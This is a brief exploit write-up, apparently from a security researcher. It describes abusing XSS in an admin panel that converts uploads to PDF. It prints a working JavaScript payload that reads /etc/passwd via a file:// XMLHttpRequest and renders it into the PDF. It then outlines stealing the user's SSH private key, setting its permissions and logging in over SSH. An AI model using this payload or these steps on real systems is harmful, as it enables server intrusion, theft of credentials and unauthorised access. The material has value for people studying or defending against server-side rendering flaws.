Situation : 

• Admin Panel infected with xss and uploading any file converted to pdf.

 

P0c from (https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html):

<script> 
x=new XMLHttpRequest; 
x.onload=function()
{ document.write(this.responseText) };
 x.open("GET","file:///etc/passwd"); x.send();
</script>

 

Explaining it in images:

Next Download the pdf :

Reading /etc/passwd success , next try to read /home/user/.ssh/rsa_id

and :

Making local id_rsa and chmod it 700.. then try to ssh !